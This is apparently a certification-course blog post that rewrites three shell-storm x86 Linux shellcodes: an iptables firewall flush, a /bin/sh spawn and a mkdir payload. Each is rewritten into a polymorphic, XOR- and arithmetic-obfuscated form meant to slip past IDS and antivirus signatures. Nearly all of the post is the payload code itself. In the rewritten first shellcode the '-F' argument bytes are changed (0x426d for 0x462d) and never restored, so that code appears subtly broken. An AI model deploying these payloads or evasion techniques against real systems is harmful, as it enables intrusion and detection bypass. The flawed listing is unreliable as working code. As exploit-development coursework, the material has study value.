SLAE Assignment #6 – Polymorphing 3 Shell-Storm Shellcodes

Right… this is assignment 6 (of 7) of the SecurityTube SLAE Exam.. In this assignment I’ll polymorph three different shellcodes, taken from shell-storm.org.

Disclaimer:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-890

Sources, as always, on my github page. Now let’s roll.

First shellcode: http://shell-storm.org/shellcode/files/shellcode-368.php (executes /sbin/iptables -F command).

Original code (AT&T Syntax):

"\x31\xd2"                      // xorl         %edx,%edx
"\x52"                          // pushl        %edx
"\x66\x68\x2d\x46"              // pushw        $0x462d
"\x89\xe6"                      // movl         %esp,%esi
"\x52"                          // pushl        %edx
"\x68\x62\x6c\x65\x73"          // pushl        $0x73656c62
"\x68\x69\x70\x74\x61"          // pushl        $0x61747069
"\x89\xe7"                      // movl         %esp,%edi
"\x68\x62\x69\x6e\x2f"          // pushl        $0x2f6e6962
"\x68\x2f\x2f\x2f\x73"          // pushl        $0x732f2f2f
"\x89\xe3"                      // movl         %esp,%ebx
"\x52"                          // pushl        %edx
"\x56"                          // pushl        %esi
"\x57"                          // pushl        %edi
"\x89\xe1"                      // movl         %esp,%ecx
"\x31\xc0"                      // xorl         %eax,%eax
"\xb0\x0b"                      // movb         $0xb,%al
"\xcd\x80"                      // int          $0x80

Since we cannot go completely crazy (new code only can be 50% bigger than the original code), I decided to simply obfuscate the /sbin/iptables string so that IDS/AV will not be able to fingerprint that string. The new shellcode (this time in Intel syntax) looks like this:

xor         edx, edx
push        edx
push        word 0x426d
mov         esi, esp
push        edx
mov         ebx, 0x313377
shr         ebx, 4
push        0x7362592B
add         dword [esp], ebx ; 'selb' modified
push        0x61715D32
add         dword [esp], ebx ; 'atpi' modified
mov         edi, esp
push        0x2F6B562B
add         dword [esp], ebx ; '/nib' modified
push        0x732C1BF8
add         dword [esp], ebx ; 's///' modified
mov         ebx, esp
push        edx
push        esi
push        edi
mov         ecx, esp
xor         eax, eax
mov         al, 0xb
int         0x80

Slightly more code but only 44% bigger than the original 🙂 Mission accomplished. Let’s checkout the next shellcode.


This time it’s a simple execve /bin/bash we’re obfuscating/polymorphing. Taken from here: http://shell-storm.org/shellcode/files/shellcode-575.php.

Original code:


"\x6a\x0b"              // push byte +0xb
"\x58"                  // pop eax
"\x99"                  // cdq
"\x52"                  // push edx
"\x68\x2f\x2f\x73\x68"  // push '//sh'
"\x68\x2f\x62\x69\x6e"  // push '/bin'
"\x89\xe3"              // mov ebx, esp
"\x31\xc9"              // xor ecx, ecx
"\xcd\x80";             // int 0x80

And here my idea of changing some stuff.


push    byte 0xb
pop     eax
cdq
push    edx
mov     ebx, 0x68732f2e
lea     ecx, [ebx+1]
push    ecx
lea     ecx, [ebx+0x5F63300+1]
push    ecx
mov     ebx, esp
xor     ecx, ecx
int     0x80

That’s only a 6 byte increase! 🙂 Next shellcode…


We use this one here: http://shell-storm.org/shellcode/files/shellcode-542.php. Creates a directory on the hard disk and exits gracefully. After ndisasm’ing (and a bit of cleanup), here the original code:


        jmp short _call_shellcode

_shellcode:
        pop esi
        xor eax,eax
        mov [esi+0x6],al            ; null-terminate string
        mov al,0x27                 ; syscall: mkdir

;  int mkdir(const char *pathname, mode_t mode);

        lea ebx,[esi]               ; string 'hacked'
        mov cx,0x1ed                ; mode: 755 (octal)
        int 0x80                    ; trigger syscall

        mov al,0x1
        xor ebx,ebx
        int 0x80                    ; exit with rc 0

_call_shellcode:
        call dword _shellcode

_string:  db 'hacked',0x23

And here the polymorphed version. I decided to encrypt the “hacked” string with xor, decrypt it on-the-fly and also get rid off another “constant”, the 755 octal value.


        jmp short _call_shellcode

_shellcode:
        pop esi
        xor eax,eax
        xor ecx, ecx
        mov edi, esi                ; save string ptr

; decrypt string with simple xor

        mov cl, 7
_loop:
        xor byte [esi], 0xbf
        inc esi
        loop _loop

        mov esi, edi
        mov al,0x27                 ; syscall: mkdir

;  int mkdir(const char *pathname, mode_t mode);

        lea ebx,[esi]               ; string 'hacked'
        mov cx,0x1ec                ; mode: 755 (octal)
        inc cx                      ; avoid fingerprinting 755 octal
        int 0x80                    ; trigger syscall

        mov al,0x1
        xor ebx,ebx
        int 0x80                    ; exit with rc 0

_call_shellcode:
        call dword _shellcode

_string:  db 0xd7, 0xde, 0xdc, 0xd4, 0xda, 0xdb, 0xbf   ; 'hacked' ^ 0xbf

That’s it. Three shellcodes polymorphed (with a bit of obfuscation to give AV/IDS a hard time :-)).

See you in the next blog post!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s